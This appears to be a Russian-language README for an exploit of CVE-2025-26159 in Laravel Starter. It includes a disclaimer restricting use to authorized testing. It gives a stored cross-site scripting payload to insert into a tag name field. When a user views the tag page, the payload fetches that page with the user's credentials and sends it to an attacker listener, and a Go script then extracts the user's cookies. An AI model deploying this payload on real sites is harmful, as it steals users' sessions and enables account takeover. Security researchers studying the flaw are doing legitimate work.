
Этот скрипт декодирует, фильтрует и извлекает cookie-файлы в рамках эксплуатации CVE-2025-26159.
Этот скрипт может использоваться только в авторизованных средах, где было получено явное разрешение. Автор не несёт ответственности за любое неправомерное использование, ущерб или последствия, возникшие в результате использования этого скрипта.
Этот скрипт декодирует, фильтрует и извлекает cookie-файлы в рамках эксплуатации CVE-2025-26159.
Чтобы понять этапы эксплуатации, ознакомьтесь с этим постом в моём блоге.
go run CVE-2025-26159.go
В поле имени тега (tag name) Laravel Starter добавьте эту полезную нагрузку:
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
После того как пользователь посетит страницу сведений о вредоносном теге, вы получите его cookie-файлы.